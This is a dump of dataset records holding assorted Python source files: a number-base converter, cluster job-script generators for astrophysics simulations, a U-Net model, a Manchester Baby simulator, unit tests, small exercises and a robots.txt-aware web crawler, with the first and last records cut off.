o8P \")\n print(\"8 8 8 8' `8 Y. .P 8 8' `8 8 \")\n print(\"8 8 8 8 8 8 `b..d' 8 8 8 8 \")\n print(\"`YooP' `YooP' 8 8 `YP' 8 8 8 8 \")\n print(\":.....::.....:..::..::...::....::..::..:\")\n print(\"::::::::::::::::::::::::::::::::::::::::\")\n print(\"::::::::::::::::::::::::::::::::::::::::\")\n print(\"ConvInt, found on github.com/georgeomnet\\n\")\n\ndef clearcheck():\n if \"win\" in platform.lower() or platform == \"darwin\":\n print(\"========================================================\\n\")\n else:\n os.system(\"clear\")\n\ndef errormessagelater():\n print(\"Sorry! That wasn't a valid answer.\")\n time.sleep(1)\n use = True\n clearcheck()\n \ndef runden():\n usernum = input(\"Enter your denary number: \")\n try:\n print(\"Here are the stats for %s:\" % usernum)\n print(\"Its hexadecimal is:\",format(int(usernum), '02X'))\n print(\"Its binary is:\",\"{0:b}\".format(int(usernum)))\n print(\"Its octal decimal is:\",oct(int(usernum)))\n except:\n print(\"Sorry, that number is not valid.\")\n runden()\n \ndef runbin():\n usernum = input(\"Enter your binary number: \")\n try:\n print(\"Here are the stats for %s:\" % usernum)\n print(\"Its denary is:\",int(usernum, 2))\n print(\"Its hexadecimal is:\",format(int(usernum), '02X')) \n print(\"Its octal decimal is:\",oct(int(usernum)))\n except:\n print(\"Sorry, that number is not valid.\")\n runbin()\n\ndef runhex():\n usernum = input(\"Enter your hexadecimal number: \")\n try:\n print(\"Here are the stats for %s:\" % usernum)\n print(\"Its denary is:\",int(usernum, 16))\n print(\"Its binary is:\",bin(int(usernum, 16))[2:])\n print(\"Its octal decimal is:\",oct(int(usernum, 16)))\n except:\n print(\"Sorry, that is not a valid hex.\")\n runhex()\n\n\ndef runoct():\n usernum = input(\"Enter your octal decimal: \")\n try:\n print(\"Here are the stats for %s\" % usernum)\n print(\"Its denary is:\",int(usernum, 8))\n print(\"Its binary is:\",bin(int(usernum, 8))[2:])\n print(\"Its hexadecimal is:\",format(int(int(usernum, 8)), '02x'))\n except:\n print(\"Sorry, that oct is not valid.\")\n runoct()\n\ndef prog():\n typeofchar = input(\"Is your number Denary (d), Binary (b), Hexadecimal (h) or Octal decimal (o)?\\n\")\n typeofchar = typeofchar.lower()\n typeofchar = typeofchar[0]\n if typeofchar == \"d\":\n runden()\n elif typeofchar == \"b\":\n runbin()\n elif typeofchar == \"h\":\n runhex()\n elif typeofchar == \"o\":\n runoct()\n else:\n print(\"Sorry! Your number is not valid.\")\n\nwhile use == True:\n bannerwin()\n prog()\n ask = input(\"Would you like to go again? y/n\\n\")\n try:\n ask = ask[0]\n ask = ask.lower()\n except:\n errormessagelater()\n if ask == \"n\":\n use = False\n elif ask == \"y\":\n use = True\n clearcheck()\n else:\n errormessagelater()\n","sub_path":"convint.py","file_name":"convint.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"522284510","text":"import os\nimport subprocess\n\n# kepler_grids\nfrom pyburst.grids import grid_strings\n\n# ========================================================\n# Functions for writing job submission scripts on cluster (e.g. monarch, ICER)\n# ========================================================\nMODELS_PATH = os.environ['KEPLER_MODELS']\n\ndef get_span_string(run0, run1, runs=None):\n \"\"\"Returns string of run0-run1, (or run0 if run0 == run1)\n \"\"\"\n if runs is not None:\n string = ''\n for run in runs:\n string += f'{run},'\n return string\n\n elif run0 == run1:\n return f'{run0}'\n else:\n return f'{run0}-{run1}'\n\n\ndef get_jobstring(batch, run0, run1, source, include_source=True):\n source = grid_strings.source_shorthand(source=source)\n span = get_span_string(run0, run1)\n source_str = ''\n\n if include_source:\n source_str = f'{source[:2]}_'\n\n return f'{source_str}{batch}_{span}'\n\n\ndef write_individual_scripts(batches, runs, source, walltime, **kwargs):\n \"\"\"Writes multiple jobscripts for individual models\n\n Created for the purpose of resubmitting particular jobs that\n failed to start.\n\n e.g. batches=[1,2,2,3], runs=[3,4,5,3] will write scripts for the models:\n batch_1_3, batch_2_4, batch_2_5, batch_3_3\n\n Parameters\n ----------\n batches : 1darray\n array of batches to write scripts for\n runs : 1darray\n array of runs corresponding to each batch in 'batches'\n \"\"\"\n for i, batch in enumerate(batches):\n run = runs[i]\n batch_str = grid_strings.get_batch_string(batch, source)\n path = os.path.join(MODELS_PATH, batch_str, 'logs')\n\n write_submission_script(batch, run0=run, run1=run, source=source,\n walltime=walltime, path=path, **kwargs)\n\n\ndef write_submission_script(batch, source, walltime, path=None,\n run0=None, run1=None, runs=None,\n parallel=False, qos='normal', basename='xrb',\n restart=False, max_tasks=16, debug=False,\n adapnet_filename=None, bdat_filename=None,\n dependency=False):\n \"\"\"Writes jobscripts to execute on MONARCH/ICER cluster\n\n Parameter:\n ----------\n runs : list (optional)\n specify an arbitrary list of runs, instead of a span from run0-run1\n parallel : bool\n launch parallel independent kepler tasks\n path : str\n target path for slurm script\n max_tasks : int\n max number of tasks allowed on one node\n \"\"\"\n source = grid_strings.source_shorthand(source=source)\n run0, run1, runs, n_runs = check_runs(run0, run1, runs)\n\n batch_str = grid_strings.get_batch_string(batch, source)\n if path is None:\n path = os.path.join(MODELS_PATH, batch_str, 'logs')\n\n if parallel:\n if n_runs > max_tasks:\n raise ValueError(f'ntasks ({n_runs}) larger than max_tasks ({max_tasks})')\n\n extensions = {'monarch': '.sh', 'icer': '.qsub'}\n\n job_str = get_jobstring(batch=batch, run0=run0, run1=run1, source=source)\n time_str = f'{walltime:02}:00:00'\n\n for cluster in ['monarch', 'icer']:\n print('Writing submission script for cluster:', cluster)\n ext = extensions[cluster]\n\n script_str = get_submission_str(run0=run0, run1=run1, runs=runs, source=source,\n batch=batch, basename=basename, qos=qos,\n time_str=time_str, job_str=job_str,\n cluster=cluster, parallel=parallel,\n debug=debug, restart=restart,\n adapnet_filename=adapnet_filename,\n bdat_filename=bdat_filename,\n dependency=dependency)\n\n span = get_span_string(run0, run1)\n prepend_str = {True: 'restart_'}.get(restart, '')\n\n filename = f'{cluster}_{prepend_str}{source}_{batch}_{span}{ext}'\n filepath = os.path.join(path, filename)\n\n with open(filepath, 'w') as f:\n f.write(script_str)\n\n if parallel:\n write_parallel_script(run0=run0, run1=run1, batch=batch, path=path,\n restart=restart, basename=basename, source=source,\n debug=debug, adapnet_filename=adapnet_filename,\n bdat_filename=bdat_filename)\n\n\ndef get_submission_str(run0, run1, source, runs, batch, basename, cluster,\n qos, time_str, parallel, job_str, debug, restart,\n adapnet_filename=None, bdat_filename=None, dependency=False):\n source = grid_strings.source_shorthand(source=source)\n span_str = get_span_string(run0, run1, runs=runs)\n batch_str = get_jobstring(batch=batch, run0=run0, run1=run1, source=source,\n include_source=False)\n # TODO: check if adapnet/bdat exists\n if adapnet_filename is None:\n adapnet_filename = 'adapnet_alex_email_dec.5.2016.cfg'\n if bdat_filename is None:\n bdat_filename = '20161114Reaclib.bdat5.fixed'\n\n # ===== restart parameters =====\n cmd_str = {True: 'z1', False: 'xrb_g'}[restart]\n restart_str = {True: 'restart_', False: ''}[restart]\n debug_str = {True: 'x', False: ''}[debug]\n\n dependency_str = ''\n dependency_bash = ''\n if dependency:\n dependency_str = '#SBATCH --dependency=singleton'\n dependency_bash = \"\"\"if (( $N == 1 ))\nthen\n sleep 60\n cd $KEPLER_MODELS/{source}_{batch}/logs\n sbatch icer_restart_{source}_{batch}_{span_str}.qsub\nfi\"\"\"\n\n if cluster == 'monarch':\n return f\"\"\"#!/bin/bash\n###################################\n#SBATCH --job-name={job_str}\n#SBATCH --output=arrayJob_%A_%a.out\n#SBATCH --error=arrayJob_%A_%a.err\n#SBATCH --array={span_str}\n#SBATCH --time={time_str}\n#SBATCH --ntasks=1\n#SBATCH --cpus-per-task=1\n#SBATCH --qos={qos}\n#SBATCH --mem-per-cpu=1024\n#SBATCH --mail-type=BEGIN,END,FAIL\n#SBATCH --mail-user=zac.johnston@monash.edu\n###################################\n\nN=$SLURM_ARRAY_TASK_ID\nEXE_PATH=$KEPLER_PATH/gfortran/keplery\nADAPNET_PATH=$PYBURST/files/{adapnet_filename}\nBDAT_PATH=$PYBURST/files/{bdat_filename}\n\ncd $KEPLER_MODELS/{source}_{batch}/{basename}$N/\nln -sf $ADAPNET_PATH ./adapnet.cfg\nln -sf $BDAT_PATH ./bdat\n$EXE_PATH {basename}$N {cmd_str} {debug_str}\"\"\"\n\n elif cluster == 'icer':\n return f\"\"\"#!/bin/bash --login\n###################################\n#SBATCH --job-name {job_str}\n#SBATCH --array={span_str}\n#SBATCH --time={time_str}\n#SBATCH --ntasks=1\n#SBATCH --cpus-per-task=1\n#SBATCH --constraint=intel16\n{dependency_str}\n#SBATCH --exclude=lac-217,lac-356,lac-357,lac-358\n#SBATCH --mem-per-cpu=1024\n#SBATCH --mail-type=BEGIN,END,FAIL\n#SBATCH --mail-user=zac.johnston@monash.edu\n###################################\nN=$SLURM_ARRAY_TASK_ID\nEXE_PATH=$KEPLER_PATH/gfortran/keplery\nADAPNET_PATH=$PYBURST/files/{adapnet_filename}\nBDAT_PATH=$PYBURST/files/{bdat_filename}\n\n{dependency_bash}\ncd $KEPLER_MODELS/{source}_{batch}/xrb$N/\nln -sf $ADAPNET_PATH ./adapnet.cfg\nln -sf $BDAT_PATH ./bdat\n$EXE_PATH {basename}$N {cmd_str}\"\"\"\n else:\n raise ValueError('invalid cluster. Must be one of [monarch, icer]')\n\n\ndef write_parallel_script(run0, run1, batch, path, source, restart, debug=False,\n basename='xrb', gen_file='xrb_g', adapnet_filename=None,\n bdat_filename=None):\n \"\"\"========================================================\n Writes a bash script to launch parallel kepler tasks\n ========================================================\"\"\"\n source = grid_strings.source_shorthand(source=source)\n print('Writing MPI script')\n if adapnet_filename is None:\n adapnet_filename = 'adapnet_alex_email_dec.5.2016.cfg'\n if bdat_filename is None:\n bdat_filename = '20161114Reaclib.bdat5.fixed'\n\n # ===== restart things =====\n debug_str = {True: 'x', False: ''}[debug]\n restart_str = {True: 'restart_', False: ''}[restart]\n start_str = {True: 'Restarting', False: 'Starting'}[restart]\n execute_str = {True: f'./k $run_str z1 {debug_str}',\n False: f'./k $run_str {gen_file}'}[restart]\n\n filename = f'parallel_{restart_str}{source}_{batch}_{run0}-{run1}.sh'\n filepath = os.path.join(path, filename)\n\n with open(filepath, 'w') as f:\n f.write(f\"\"\"#!/bin/bash\n\nexe_path=$KEPLER_PATH/gfortran/keplery\nbatch_dir=$KEPLER_MODELS/{source}_{batch}\nADAPNET_PATH=$PYBURST/files/{adapnet_filename}\nBDAT_PATH=$PYBURST/files/{bdat_filename}\n\nfor run in $(seq {run0} {run1}); do\n run_str=\"{basename}${{run}}\"\n echo \"{start_str}\"\n cd $batch_dir/$run_str\n ln -sf $exe_path ./k\n ln -sf $ADAPNET_PATH ./adapnet.cfg\n ln -sf $BDAT_PATH ./bdat\n {execute_str} > ${{run_str}}_std.out &\ndone\n\necho 'Waiting for jobs to finish'\nwait\necho 'All jobs finished'\"\"\")\n\n # ===== make executable =====\n subprocess.run(['chmod', '+x', filepath])\n\n\ndef check_runs(run0, run1, runs):\n \"\"\"Checks run parameters, and returns necessary values\n\n Behaviour:\n if runs is None: assume full span from run0-run1\n if runs is not None: use runs specified\n\n Returns:\n run0, run1, runs, n_runs\n \"\"\"\n if (run0 is None\n and run1 is None\n and runs is None):\n raise ValueError('Must provide both run0 and run1, or runs')\n\n if runs is None:\n return run0, run1, runs, (run1 - run0 + 1)\n else:\n return runs[0], runs[-1], runs, len(runs)\n","sub_path":"pyburst/kepler/kepler_jobscripts.py","file_name":"kepler_jobscripts.py","file_ext":"py","file_size_in_byte":9638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"521486253","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nt = int(input())\nfor i in range(0, t):\n len =int(input()) \n l = [int(x) for x in input().split(\" \")]\n for j in range (0,len):\n if(l.count(l[j])%2!=0):\n print(l[j])\n break\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Code/CodeRecords/2424/60762/259658.py","file_name":"259658.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"129853134","text":"def matrix_element_sum(matrix):\n column_map = {}\n price = 0\n\n for row in matrix:\n for index, item in enumerate(row):\n if item == 0:\n column_map[str(index)] = False\n else:\n check_price = column_map.get(str(index), True)\n if check_price:\n price += item\n\n return price\n\n\nprint(matrix_element_sum([[0, 1, 1, 2],\n [0, 5, 0, 0],\n [2, 0, 3, 3]]))\n","sub_path":"codefight/arrays/matrix_element_sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"35520524","text":"def extract_even(string):\n dic=[]\n for i in string:\n if i %2 ==0:\n dic.append(i)\n dic= sorted(dic)\n print(dic)\n return dic\nstring= [1, 4, 2, 8, 5, -1, 10]\nextract_even(string)\n\neven_list = extract_even([1, 2, 5, -10, 9, 6])\n\nif set(even_list) == set([2, -10, 6]):\n print(\"Your function is correct\")\nelse:\n print(\"Ooops, bugs detected\")\n","sub_path":"Buoi 5/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"193461914","text":"import os\n\nfrom lib.deck import Deck\nGIT_PATH = os.environ['GIT_PATH']\n\ndef info(workdir):\n deck = Deck('0000000')\n path = os.path.join(GIT_PATH,workdir,'.git/refs')\n git_tree = []\n\n branch = tree_grouth(path, '/')\n\n return deck.response(\"PEDDING\",branch)\n\n\ndef tree_grouth(path, node):\n branch = [node]\n for elf in os.listdir(path):\n elf_path = os.path.join(path, elf)\n if os.path.isdir(elf_path):\n branch.append(tree_grouth(elf_path, elf))\n else:\n branch.append(elf)\n\n return branch\n\n\n","sub_path":"flask/git_docker/git/items/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"414227011","text":"class Solution: \n #2014-10-15\n #Two Sum \n # @return a tuple, (index1, index2)\n def twoSum(self, num, target):\n x = [t for t in num]\n x.sort()\n x1 = [t for t in x if t <= target/2]\n x2 = [t for t in x if t >= target/2] \n \n for i in range(len(x1)):\n try:\n j = x2.index(target - x1[i]) \n index1 = num.index(x1[i])\n index2 = num.index(x2[j])\n if index1 == index2:\n for z in range(index1 + 1, len(num)):\n if num[z] == x2[j]:\n index2 = z\n if index1 > index2:\n return (index2+1, index1+1)\n return (index1 + 1, index2 + 1)\n except:\n continue","sub_path":"LeetCode/Solved/oj001.py","file_name":"oj001.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"69409703","text":"# Copyright (c) 2019 UFCG-LSD.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\n\nfrom broker.utils.linkedlist import LinkedList\nfrom broker.utils.accumulated_sum_linked_list import AccumulatedSumLinkedList\nfrom broker.service.job_cleaner_daemon import JobRepr\n\n\nclass TestLinkedList(unittest.TestCase):\n\n \"\"\"\n Set up linkedlist object\n \"\"\"\n\n def setUp(self):\n self.linkedlist = LinkedList()\n self.accumulated_sum_linked_list = AccumulatedSumLinkedList()\n\n def tearDown(self):\n pass\n\n \"\"\"\n Test element insertion in linkedlist\n \"\"\"\n\n def test_insert_element(self):\n\n element1 = JobRepr('kj-123123', 10)\n element2 = JobRepr('kj-321321', 10)\n element3 = JobRepr('kj-321111', 15)\n element4 = JobRepr('kj-321222', 5)\n element5 = JobRepr('kj-321222', 100)\n\n self.accumulated_sum_linked_list.insert(element1)\n self.accumulated_sum_linked_list.insert(element2)\n self.accumulated_sum_linked_list.insert(element3)\n self.accumulated_sum_linked_list.insert(element4)\n self.accumulated_sum_linked_list.insert(element5)\n\n remaining_time_list = [5, 5, 5, 85]\n app_ids_list = [['kj-321222'],\n ['kj-123123', 'kj-321321'],\n ['kj-321111'],\n ['kj-321222']]\n\n obj_to_list = self.accumulated_sum_linked_list.to_list()\n\n for i in range(len(obj_to_list)):\n self.assertEqual(remaining_time_list[i],\n obj_to_list[i].get_remaining_time())\n\n for j in range(len(app_ids_list[i])):\n self.assertTrue(app_ids_list[i][j] in\n obj_to_list[i].get_app_ids())\n\n def test_push_element(self):\n\n element1 = JobRepr('kj-123123', 10)\n element2 = JobRepr('kj-321321', 10)\n element3 = JobRepr('kj-321111', 15)\n element4 = JobRepr('kj-321222', 5)\n element5 = JobRepr('kj-321222', 100)\n\n self.linkedlist.push(element1)\n self.linkedlist.push(element2)\n self.linkedlist.push(element3)\n self.linkedlist.push(element4)\n self.linkedlist.push(element5)\n\n remaining_time_list = [10, 10, 15, 5, 100]\n obj_to_list = self.linkedlist.to_list()\n\n app_ids_list = [['kj-123123'],\n ['kj-321321'],\n ['kj-321111'],\n ['kj-321222'],\n ['kj-321222']]\n\n for i in range(len(obj_to_list)):\n self.assertEqual(remaining_time_list[i],\n obj_to_list[i].get_remaining_time())\n\n for j in range(len(app_ids_list[i])):\n self.assertTrue(app_ids_list[i][j] in\n obj_to_list[i].get_app_ids())\n\n def test_pop_element(self):\n\n objs = [JobRepr('kj-123123', 10),\n JobRepr('kj-321321', 10),\n JobRepr('kj-321111', 15),\n JobRepr('kj-321222', 5),\n JobRepr('kj-321222', 100)]\n\n for obj in objs:\n self.linkedlist.push(obj)\n\n size = 5\n\n for i in range(size):\n self.assertEqual(self.linkedlist.pop().value, objs[i])\n size -= 1\n self.assertEqual(self.linkedlist.size(), size)\n\n def test_size(self):\n\n self.assertTrue(self.linkedlist.is_empty())\n self.assertEqual(self.linkedlist.size(), 0)\n\n self.linkedlist.push(0)\n self.linkedlist.push(50)\n\n self.assertFalse(self.linkedlist.is_empty())\n self.assertEqual(self.linkedlist.size(), 2)\n\n self.linkedlist.pop()\n self.assertFalse(self.linkedlist.is_empty())\n self.assertEqual(self.linkedlist.size(), 1)\n\n self.linkedlist.pop()\n self.assertTrue(self.linkedlist.is_empty())\n self.assertEqual(self.linkedlist.size(), 0)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"broker/tests/unit/utils/test_linkedlist.py","file_name":"test_linkedlist.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"33555401","text":"import pandas as pd\r\nfrom sklearn import model_selection\r\n\r\ndf_train = pd.read_csv(\"../input/adult.csv\")\r\ntarget = \"income\"\r\ndf_train[\"kfold\"] = -1\r\n\r\n# Shuffling data\r\ndf_train = df_train.sample(frac=1).reset_index(drop=True)\r\n\r\ny = df_train[target].values\r\n\r\nkf = model_selection.StratifiedKFold(n_splits=5)\r\nfor f, (t_, v_) in enumerate(kf.split(X=df_train,y=y)):\r\n df_train.loc[v_, 'kfold'] = f\r\n\r\ndf_train.to_csv(\"../input/adult_folds.csv\", index=False)","sub_path":"ml_06_us_adult_imcome/src/create_folds.py","file_name":"create_folds.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"483064343","text":"# full assembly of the sub-parts to form the complete net\n\nimport torch.nn.functional as F\n\nimport torch.nn as nn\n\nimport os\n\n\n\nfrom libs.unet_parts import inconv,down,up,outconv\n\n\nclass UNet(nn.Module):\n def __init__(self, n_classes,n_channels=3):\n super(UNet, self).__init__()\n filters = [32,64,96,128,256] #[64,128,256,512,1024]\n self.n_classes = n_classes\n self.inc = inconv(n_channels, filters[0]) \n self.down1 = down(filters[0], filters[1])\n self.down2 = down(filters[1], filters[2])\n self.down3 = down(filters[2], filters[3])\n self.down4 = down(filters[3], filters[3])\n self.up1 = up(filters[3]+filters[3], filters[2])\n self.up2 = up(filters[2]+filters[2], filters[1])\n self.up3 = up(filters[1]+filters[1], filters[0])\n self.up4 = up(filters[0]+filters[0], 16)\n self.outc = outconv(16, n_classes)\n \n \n\n def forward(self, x):\n x_size = x.size()\n x1 = self.inc(x)\n \n x2 = self.down1(x1)\n \n x3 = self.down2(x2)\n \n x4 = self.down3(x3)\n \n x5 = self.down4(x4)\n \n x = self.up1(x5, x4)\n \n x = self.up2(x, x3)\n \n x = self.up3(x, x2)\n \n \n x = self.up4(x, x1)\n \n x = self.outc(x)\n \n x = F.interpolate(x, x_size[2:], mode='bilinear', align_corners=False)\n return x\n '''\n if labels is not None:\n\n classwise_pixel_acc, classwise_gtpixels, classwise_predpixels = prediction_stat([x], labels, self.n_classes)\n\n # Need to perform this operation for MultiGPU\n classwise_pixel_acc = Variable(torch.FloatTensor([classwise_pixel_acc]).cuda())\n classwise_gtpixels = Variable(torch.FloatTensor([classwise_gtpixels]).cuda())\n classwise_predpixels = Variable(torch.FloatTensor([classwise_predpixels]).cuda())\n\n return x, classwise_pixel_acc, classwise_gtpixels, classwise_predpixels\n else:\n return x\n '''\n","sub_path":"00_代码/02_噪声标签实验代码/毕业论文代码/02_Weight_Loss_UNet/libs/unet_model.py","file_name":"unet_model.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"82199470","text":"#!/usr/bin/env python\n#\n# Manchester Baby simulator\n#\nimport Register\nimport StoreLines\nimport CPU\n\n# Dictionary containing the instruction set, the associted 'mnemonic' and the 'description' of the instruction.\n#\n# Instructions are stored in a list with each entry being a dictionary item. The dictionary item contains the\n# SSEM opcode for instruction along with information about the instruction:\n#\n# { mnemonic: code, instruction: details }\n#\n# The instruction detail is a dictionary item containing the following items:\n# Opcode\n# English description of the purpose of the instruction.\n#\ninstructions = [\n { 'mnemonic': 'JMP', 'opcode': 0, 'description': 'Copy the contents of store line to CI' },\n { 'mnemonic': 'JRP', 'opcode': 1, 'description': 'Add the content of the store line to CI' },\n { 'mnemonic': 'JPR', 'opcode': 1, 'description': 'Add the content of the store line to CI' },\n { 'mnemonic': 'JMR', 'opcode': 1, 'description': 'Add the content of the store line to CI' },\n { 'mnemonic': 'LDN', 'opcode': 2, 'description': 'Copy the content of the store line, negated, into the Accumulator' },\n { 'mnemonic': 'STO', 'opcode': 3, 'description': 'Copy the contents of the Accumulator to the store line' },\n { 'mnemonic': 'SUB', 'opcode': 4, 'description': 'Subtract the contents of the store line from the Accumulator' },\n { 'mnemonic': 'CMP', 'opcode': 6, 'description': 'Skip the next instruction if the content of the Accumulator is negative' },\n { 'mnemonic': 'SKN', 'opcode': 6, 'description': 'Skip the next instruction if the content of the Accumulator is negative' },\n { 'mnemonic': 'STOP', 'opcode': 7, 'description': 'Light the stop light and halt the machine' },\n { 'mnemonic': 'HLT', 'opcode': 7, 'description': 'Light the stop light and halt the machine' },\n { 'mnemonic': 'STP', 'opcode': 7, 'description': 'Light the stop light and halt the machine' }\n ]\n\ndef ReverseBits(value, bitCount = 32):\n '''Reverse the bits in the specified value. This method provides the CPU\n with the ability to translate SSEM numbers into conventional twos complement\n numbers used in modern computers.\n\n SSEM numbers are twos complement numbers with the LSB and MSB reversed\n compared to conventional twos complement form.'''\n result = 0\n while (bitCount > 0):\n result <<= 1\n if (value & 1):\n result |= 1\n value >>= 1\n bitCount -= 1\n return(result)\n\ndef Assembler(fileName, storeLines):\n '''Open the specified file and convert the assembler instructions into\n binary and save into the storeLines.'''\n with open(fileName, \"r\") as source:\n lineNumber = 0\n for line in source:\n lineNumber += 1\n words = line.rstrip('\\n').split()\n if (words[0] != '--'):\n sl = int(words[0].strip(':'))\n m = words[1].upper()\n if (m == 'NUM'):\n store = ReverseBits(int(words[2]))\n else:\n i = next((i for i, x in enumerate(instructions) if (x['mnemonic'] == m)), None)\n if (i == None):\n print('Cannot process line {}: {}'.format(lineNumber, line))\n exit()\n else:\n opcode = instructions[i]['opcode']\n if (m in ['STOP', 'HLT', 'CMP', 'SKN']):\n ln = 0\n else:\n ln = int(words[2])\n store = ReverseBits(ln | (opcode << 13))\n storeLines.SetLine(sl, Register.Register(store))\n#\n# The Manchester Baby\n#\nstoreLines = StoreLines.StoreLines(32)\nAssembler('Samples/hfr989.asm', storeLines)\ncpu = CPU.CPU(storeLines)\ncpu.RunProgram(debugging = False)\n","sub_path":"ManchesterBaby.py","file_name":"ManchesterBaby.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"152284420","text":"import requests, os\nfrom urllib.parse import urljoin, urlparse\nfrom bs4 import BeautifulSoup\nfrom reppy.robots import Robots\nimport json\n\nheaders = {\n\t'User-Agent': 'mind32544',\n\t'From': 'jirateep.t@ku.th'\n}\n\nlongest_url_path = 10\nspecific_domains = ['ku.ac.th']\nmax_nb_of_web_page = 20000\n# nb_of_collected = 0\n\ndef is_in_specific_domain(url) :\n\tfor domain in specific_domains :\n\t\tif domain in url :\n\t\t\treturn True\n\treturn False\n\ndef get_page(url) :\n\tglobal headers\n\ttext = ''\n\ttry :\n\t\tr = requests.get(url,headers=headers,timeout=2)\n\t\ttext = r.text\n\t\tif r.status_code != 200 :\n\t\t\ttext = ''\n\texcept(KeyboardInterrupt, SystemExit) :\n\t\traise\n\texcept :\n\t\tprint('GET PAGE ERROR!')\n\treturn text.lower()\n\ndef find_collect_file(url, raw_html) :\n\tpath = urlparse(url).path\n\tfilename = path.split('/')[-1]\n\tbase_url = urljoin(url, '/')\n\tremoving_words = ['http://', 'https://', ':80', ':8000', ':212']\n\tfor word in removing_words :\n\t\tbase_url = base_url.replace(word, '')\n\tpath = base_url.replace('/', '') + path\n\tif filename == '' :\n\t\tif path[-1] != '/' :\n\t\t\tpath += '/'\n\t\tfilename = 'index.html'\n\t\tpath += filename\n\treturn path, (filename.split('.')[-1] in ['html', 'htm'] or filename == 'robots.txt') and 'ku.ac.th' in path\n\ndef collect_file(url, raw_html, head_dir, is_count) :\n\tpath, is_collect = find_collect_file(url, raw_html)\n\tif is_collect :\n\t\tif is_count :\n\t\t\tglobal nb_of_collected, max_nb_of_web_page\n\t\t\tnb_of_collected += 1\n\t\t\tprint(f'[{nb_of_collected}/{max_nb_of_web_page}] collecting: {url}')\n\t\tdirectory_list = path.split('/')\n\t\tfor i in range(len(directory_list)) :\n\t\t\tdir_path = head_dir + '/'.join(directory_list[:i])\n\t\t\tif not os.path.isdir(dir_path) :\n\t\t\t\tos.makedirs(dir_path)\n\t\twith open(head_dir + '/'.join(directory_list), 'w', encoding='utf-8') as fw :\n\t\t\tfw.write(raw_html)\n\ndef is_do_not_want_this_file_type(url) :\n\tdo_not_want_list = ['.pdf', '.doc', '.xls', '.png', '.jpg', '.wmv', '.avi', '.mov', '.mp', '.zip', '.rar', ' ']\n\tfor i in do_not_want_list :\n\t\tif i in url :\n\t\t\treturn True\n\treturn False\n\ndef link_parser(raw_html, url) :\n\tglobal longest_url_path\n\turls = []\n\tsoup = BeautifulSoup(raw_html, 'html.parser')\n\tfor a_tag in soup.find_all('a') :\n\t\tlink = a_tag.get('href')\n\t\tfull_link = urljoin(url,link)\n\t\tis_path_long = len((urlparse(full_link).path).split('/')) > longest_url_path\n\t\tis_name_long = False\n\t\tfor i in (urlparse(full_link).path).split('/') :\n\t\t\tif len(i) > 100 :\n\t\t\t\tis_name_long = True\n\t\tif len(full_link) > 0 and full_link not in urls and not is_path_long and is_in_specific_domain(full_link) and not is_do_not_want_this_file_type(full_link) and not is_name_long and '*' not in full_link:\n\t\t\turls.append(full_link)\n\treturn urls\n\ndef is_robot_correct_syntax(robot_text) :\n\tkeywords = ['user-agent:', 'allow:']\n\tfor key in keywords :\n\t\tif key not in robot_text :\n\t\t\treturn False\n\treturn True\n\ndef allow(robot_url, url, text) :\n\tglobal headers\n\trobots = Robots.fetch(robot_url)\n\treturn robots.allowed(url, headers['User-Agent'])\n\n\ndef is_robot_allow(url) :\n\trobot_url = Robots.robots_url(url)\n\trobot_text = get_page(robot_url)\n\tif len(robot_text) > 0 and is_robot_correct_syntax(robot_text) :\n\t\tcollect_file(robot_url, robot_text, 'robot/', False)\n\t\tif 'sitemap:' in robot_text :\n\t\t\tcollect_file(robot_url, robot_text, 'sitemap/', False)\n\t\treturn allow(robot_url, url, robot_text)\n\treturn True\n\ndef write_queue(queue, filename) :\n\twith open(filename, 'w', encoding='utf-8') as fw :\n\t\tjson.dump(queue, fw)\n\t\t# fw.write('\\n'.join(queue))\n\t\n\ndef load_queue(filename) :\n\twith open(filename, 'r', encoding='utf-8') as fr :\n\t\treturn json.load(fr)\n\t\t# queue = fr.readlines()\n\t\t# return [url.replace('\\n', '') for url in queue]\n\ndef write_nb(nb, filename) :\n\twith open(filename, 'w', encoding='utf-8') as fw :\n\t\tfw.write(str(nb))\n\ndef load_nb(filename) :\n\twith open(filename, 'r', encoding='utf-8') as fr :\n\t\tlines = fr.readlines()\n\t\treturn int(lines[0])\n\nif not os.path.isfile('nb_of_collected.txt') :\n\twrite_nb(0, 'nb_of_collected.txt')\nif not os.path.isfile('frontier_q.txt') :\n\twrite_queue(['http://www.ku.ac.th/web2012/'], 'frontier_q.txt')\nif not os.path.isfile('visited.txt') :\n\twrite_queue([], 